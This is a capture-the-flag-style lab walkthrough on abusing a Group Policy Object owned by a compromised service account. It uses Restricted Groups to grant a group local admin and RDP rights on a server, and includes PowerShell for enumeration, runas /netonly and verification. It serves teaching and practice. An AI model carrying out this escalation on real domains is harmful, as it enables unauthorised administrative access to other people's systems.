Exploiting GPOs
Last time we decrypted the database and recovered the credentials of the svcServMan account. Now we continue the attack by enumerating again from the perspective of that account and seeing where it leads. Let's load the SharpHound data we collected earlier into BloodHound and look at what svcServMan can reach.

One permission in particular stands out for this account: ownership of a Group Policy Object (GPO). The owner of an AD object can always rewrite its DACL, so ownership effectively means the account can modify the GPO. Digging a little further, this GPO is linked to the OU that contains our THMSERVER2 machine, so its settings are applied there:

Group Policy Objects
Remember when we discussed the SYSVOL directory in Enumerating AD? This is the share on the domain controllers where the files behind AD GPOs are stored and replicated to every domain-joined machine. A GPO is a virtual collection of policy settings. Each GPO is identified by a globally unique identifier (GUID); its display name is what you see in the management console, but the GUID is what names its folder under SYSVOL\<domain>\Policies and what is referenced when the GPO is linked to a container.

Each Windows computer has a Local Policy Configuration. This contains several notable configurations such as:
Application configuration for services such as the Firewall, Anti-Virus, and AppLocker.
Local Group membership such as the Administrator or Remote Desktop Users groups.
Startup configuration such as scripts that should be executed.
Security and protocol settings such as SMBv1 support.
Group Policy Management
If you only have one Windows computer, it is easy to change the local policy configuration directly on the host. In a large organisation, however, you need a mechanism to deploy a configuration from a central location. This is where Group Policy Management (GPM) comes into play. Instead of defining policies locally on each machine, GPM lets us define GPOs in AD and link them to containers in the directory structure: a site, the domain, or a specific OU. Every computer or user under that container receives the policy (optionally narrowed with security filtering on groups).
Domain-joined computers then periodically pull the policies that are linked to their location in AD from SYSVOL and apply them. Whoever can modify a linked GPO can therefore push settings to every machine that receives it, which is exactly what we are about to do.
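Before touching the GPO it is worth confirming from a shell what BloodHound showed: which rights svcServMan holds on the GPO, where the GPO is linked, and where its files sit in SYSVOL. The following PowerShell is an added example and is not part of the original write-up or the lab material. It assumes the RSAT GroupPolicy and ActiveDirectory modules are available on the host we run it from, and the domain name `domain.local` is a placeholder for the lab domain.

```powershell
# Added example (not from the original write-up). Assumptions: RSAT GroupPolicy and
# ActiveDirectory modules are installed; "domain.local" is a placeholder domain name.
Import-Module GroupPolicy
Import-Module ActiveDirectory

$Domain  = "domain.local"               # placeholder, replace with the lab domain
$GpoName = "Management Server Pushes"   # the GPO svcServMan can modify

# 1. Resolve the GPO. Its Id is the GUID that names the policy folder under SYSVOL.
$gpo = Get-GPO -Name $GpoName -Domain $Domain
"GPO '{0}' has GUID {1}" -f $gpo.DisplayName, $gpo.Id

# 2. Who can do what on this GPO? A raw GenericWrite or ownership ACE does not map to one
#    of the named GPM permission levels, so it usually shows up as GpoCustom. Anything
#    beyond GpoRead/GpoApply for a non-admin trustee deserves a closer look.
Get-GPPermission -Guid $gpo.Id -DomainName $Domain -All |
    Where-Object { $_.Permission -notin @("GpoRead", "GpoApply") } |
    Select-Object @{ n = "Trustee"; e = { $_.Trustee.Name } }, Permission, Inherited

# 3. Where is it linked? An OU whose gPLink attribute contains the GPO GUID receives the
#    policy, so every computer under that OU (THMSERVER2 here) will apply it.
Get-ADOrganizationalUnit -Filter * -Properties gPLink |
    Where-Object { $_.gPLink -match [regex]::Escape($gpo.Id.ToString()) } |
    Select-Object DistinguishedName

# 4. The policy files themselves live in SYSVOL. Restricted Groups settings end up in
#    GptTmpl.inf under the Machine half of the GPO; an unmodified GPO may not have it yet.
$gpoPath = "\\$Domain\SYSVOL\$Domain\Policies\{$($gpo.Id)}"
Get-ChildItem -Recurse $gpoPath | Select-Object FullName
$inf = Join-Path $gpoPath "Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf"
Get-Content -Path $inf -ErrorAction SilentlyContinue
```

Run it from the cmd started with svcServMan's credentials (see below) so that the LDAP and SMB calls are made as that account; step 2 then shows the rights BloodHound reported, and step 3 should list the Management Servers OU that THMSERVER2 lives in.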

Exploiting GPOs
Because svcServMan has a GenericWrite ACE on the GPO, it can change the settings the GPO pushes. We will use it to add the IT Support group (of which our account is a member) to both the local Administrators and local Remote Desktop Users groups on THMSERVER2. That gives us administrative privileges on THMSERVER2 and the ability to RDP in.
First, RDP in as the Tier 2 admin account that we previously took control of.
From that session, start a new cmd that runs with svcServMan's credentials (runas with /netonly is enough, since we only need the network connections to the DC to be made as svcServMan).
From that cmd, open mmc.
Adding Groups in the GPO
We now want to add the Group Policy Management snap-in:
Click File -> Add/Remove Snap-in
Select the Group Policy Management snap-in and click Add
Click Ok

We can now navigate to the GPO that our user has permission to modify (Servers > Management Servers > Management Server Pushes).

We can right-click on the GPO and select Edit. This will open the new Group Policy Management Editor window.

In order to add our account to the local groups, we need to perform the following steps:
Expand Computer Configuration
Expand Policies
Expand Windows Settings
Expand Security Settings
Right-click on Restricted Groups and select Add Group. (If an IT Support entry already exists, someone has already performed the exploit. You can either delete it and create it yourself, or just inspect it to see what was configured.)
Click Browse, enter IT Support and click Check Names.
Click OK twice.

Leave the first list ("Members of this group") empty: it would enforce an exact membership list for the IT Support group, which is not what we want. The second list ("This group is a member of") is additive, so there we add both the Administrators and Remote Desktop Users groups. In the end, it should look something like this:

Once the configuration has been made, click Apply and OK. Now all we need to do is wait for the GPO to be applied; in this environment that takes at most 15 minutes. (Outside the lab, the default background refresh interval for domain members is 90 minutes plus a random offset of up to 30 minutes, and gpupdate on the target applies the change immediately if you already have any session there.) After the refresh, our initial account, being a member of the IT Support group, will have administrative and RDP permissions on THMSERVER2.
If the Tier 2 admin account is not already a member of the IT Support group, add it first (this needs an account with rights to modify that group).
Log out and SSH into THMSERVER2 as the Tier 2 admin account.

Verify that the account is in the IT Support group and that, through it, it is now a member of the local Administrators group.

Get the flag from the Administrator's Desktop.
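The command-line side of the procedure above, from starting the shell as svcServMan to checking that the pushed setting actually landed on THMSERVER2, as an added example that is not part of the original write-up. It assumes the domain name `domain.local` is a placeholder, that svcServMan's password is typed interactively, and that the final section is run on THMSERVER2 itself once you have a session there.

```powershell
# Added example (not from the original write-up). Assumptions: "domain.local" is a
# placeholder domain; the GroupPolicy module is available where section (b) runs;
# section (c) runs on THMSERVER2.
$Domain = "domain.local"

# (a) From the Tier 2 admin RDP session: a cmd whose outbound network connections use
#     svcServMan's credentials. /netonly leaves the local token as-is, so it works even if
#     svcServMan has no interactive logon rights on this host. Launch mmc from that window.
runas /netonly "/user:$Domain\svcServMan" cmd.exe
# In the new window:  mmc

# (b) After saving the Restricted Groups entry, check SYSVOL now carries it. Restricted
#     Groups are written to GptTmpl.inf as <group>__Memberof / <group>__Members lines,
#     with groups given as names or *-prefixed SIDs. The local groups we added appear by
#     their well-known SIDs: S-1-5-32-544 is Administrators, S-1-5-32-555 is Remote
#     Desktop Users. Seeing them here means the edit is saved on the DC; it still has
#     to be picked up by the client's refresh.
$gpo = Get-GPO -Name "Management Server Pushes" -Domain $Domain
$inf = "\\$Domain\SYSVOL\$Domain\Policies\{$($gpo.Id)}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf"
Select-String -Path $inf -Pattern '\[Group Membership\]|__Memberof|__Members'

# (c) On THMSERVER2, once the refresh has happened (or after forcing it), the IT Support
#     group should show up inside both local groups and our token should carry it.
gpupdate /force /target:computer
Get-LocalGroupMember -Group "Administrators"
Get-LocalGroupMember -Group "Remote Desktop Users"
whoami /groups | findstr /i /C:"IT Support"
```

If section (b) shows the Memberof line but section (c) does not show IT Support in the local groups, the client has simply not refreshed yet; re-run gpupdate or wait out the refresh interval rather than re-editing the GPO. The findstr call uses /C: so that the two words of the group name are matched as one string instead of as two separate patterns.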
